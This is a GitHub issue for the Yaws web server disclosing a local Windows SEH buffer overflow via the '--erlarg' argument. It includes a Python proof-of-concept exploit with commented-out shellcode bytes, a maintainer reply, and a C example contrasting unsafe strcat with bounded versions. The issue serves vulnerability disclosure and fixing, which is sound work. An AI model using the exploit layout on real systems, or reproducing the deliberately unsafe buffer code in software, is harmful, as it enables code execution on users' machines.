erlyaws / yaws

Yaws webserver
https://erlyaws.github.io
BSD 3-Clause "New" or "Revised" License

Windows SEH Buffer overflow #354

Open mvmendes opened 5 years ago

mvmendes commented 5 years ago

https://github.com/klacke/yaws/blob/493ecfe60d722be506bc3ee8a9b12c69bf1e3580/win32/yaws.c#L211 This line opens a local vulnerability that could be exploited with the SEH buffer overflow technique. I exploited it in this PoC (Python):

```python
# PoC as posted (Python 2 byte strings; under Python 3 the '\x90' bytes
# would be UTF-8 encoded on the way to CreateProcess and shift the offsets).
from subprocess import call

junk = 'A' * 201                  # filler up to the SEH record
nops = '\x90' * 2
nseh = 'BBBB'                     # next SEH: jmp short +2 (\xEB\x02) goes here
seh = 'CCCC'                      # SEH handler: pop, pop, ret gadget goes here
#cmd =  "\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x06\x8B\x68\x08\x68\x11\x11\x11\x11\x66\x68\x11\x11\x5B\x53\x55\x5B\x66\x81\xC3\x4B\x85\xFF\xD3\xEB\xEA"
#cmd =  '\x31\xc0\x50\x68\x42\x34\x6d\x7c\x68\x7c\x42\x33\x6d\x89\xe1\xbb\xd4\x29\x86\x7c\x51\x50\xff\xd3'#'\x8b\xec\x68\x65\x78\x65'+'\x20\x68\x63\x6d\x64\x2e'+'\x8d\x45\xf8\x50\xb8\x8D'+'\x15\x86\x7C\xff\xd0'
cmd = ('\x90' * 41) + 'Z'         # shellcode slot: 42 bytes max (beyond that the buffer wraps the byte array)
print(len(cmd))

buf = junk + nseh + seh + nops + cmd   # 201 + 4 + 4 + 2 + 42 = 253 bytes

buf = buf + ('E' * (253 - len(buf))) + 'XXXX'   # EDX overflowed to 58585858 (XXXX) at positions 254-257
buf = buf + ('E' * (510 - len(buf)))            # need at least 510 chars to overflow the buffer
print('>yaws.exe --erlarg ' + buf)
print(len(buf))
call(["c:\\Yaws-2.0.4\\bin\\yaws.exe", "--erlarg", buf])
```


EDX also overflowed to XXXX.

vinoski commented 5 years ago

Thanks! Turns out there are quite a few similar issues in this file, where calls to sprintf or strcat could overflow buffers. I'm working on fixing them. One issue I will run into, though, is that I personally don't have a platform on which I can build and verify the changes. If anyone would be willing to help in that department, please let me know.
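The bug class in both comments above (an `--erlarg` value concatenated into a fixed-size buffer with `strcat`/`sprintf`, no length check) and its bounded replacement, as an added example. This is not code from yaws.c or from the issue: the function names, the `erl` prefix and the `CMDLINE_CAP` size are assumptions chosen for illustration, and the 510-byte argument is constructed to mirror the PoC length.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical buffer size; not the size used in yaws.c. */
#define CMDLINE_CAP 256

/* Unsafe pattern the issue describes: strcpy/strcat into a fixed buffer.
 * With erlarg longer than the buffer this writes past the end (undefined
 * behaviour; on Windows it can clobber the SEH record on the stack).
 * Shown for contrast only; never call it with untrusted argument lengths. */
static void build_cmdline_unsafe(char *out, const char *erl, const char *erlarg) {
    strcpy(out, erl);
    strcat(out, " ");
    strcat(out, erlarg);
}

/* Bytes the unsafe builder would write, NUL included, so a caller can see
 * whether a given --erlarg value exceeds a buffer of a given size. */
static size_t unsafe_bytes_needed(const char *erl, const char *erlarg) {
    return strlen(erl) + 1 + strlen(erlarg) + 1;
}

/* Hardened form 1: bounded append that fails instead of overflowing.
 * Returns 0 on success, -1 if src (plus the NUL) would not fit. */
static int append_checked(char *dst, size_t cap, const char *src) {
    size_t used = strlen(dst);
    size_t need = strlen(src);
    if (used >= cap || need >= cap - used)
        return -1;
    memcpy(dst + used, src, need + 1);
    return 0;
}

static int build_cmdline_safe(char *out, size_t cap, const char *erl, const char *erlarg) {
    if (cap == 0)
        return -1;
    out[0] = '\0';
    if (append_checked(out, cap, erl) != 0)   return -1;
    if (append_checked(out, cap, " ") != 0)   return -1;
    if (append_checked(out, cap, erlarg) != 0) return -1;
    return 0;
}

/* Hardened form 2: snprintf in place of sprintf. snprintf never writes past
 * cap, but it returns the length it *wanted*, so the truncation check is
 * still required; silently truncating a command line is its own bug. */
static int build_cmdline_snprintf(char *out, size_t cap, const char *erl, const char *erlarg) {
    int n = snprintf(out, cap, "%s %s", erl, erlarg);
    if (n < 0 || (size_t)n >= cap)
        return -1;
    return 0;
}

int main(void) {
    char buf[CMDLINE_CAP];
    /* Constructed input: 510 'A's, the length the PoC needed. */
    char *big = malloc(511);
    memset(big, 'A', 510);
    big[510] = '\0';

    printf("unsafe builder would write %zu bytes into a %d-byte buffer\n",
           unsafe_bytes_needed("erl", big), CMDLINE_CAP);
    printf("checked strcat: %s\n",
           build_cmdline_safe(buf, sizeof buf, "erl", big) == 0 ? "ok" : "rejected");
    printf("snprintf:       %s\n",
           build_cmdline_snprintf(buf, sizeof buf, "erl", big) == 0 ? "ok" : "rejected");

    if (build_cmdline_safe(buf, sizeof buf, "erl", "-s yaws") == 0)
        printf("short argument builds: \"%s\"\n", buf);
    (void)build_cmdline_unsafe;
    free(big);
    return 0;
}
```

The point of returning an error rather than truncating is that the caller (here, the launcher that goes on to `CreateProcess`) can refuse to start with a mangled command line instead of running something other than what the operator asked for.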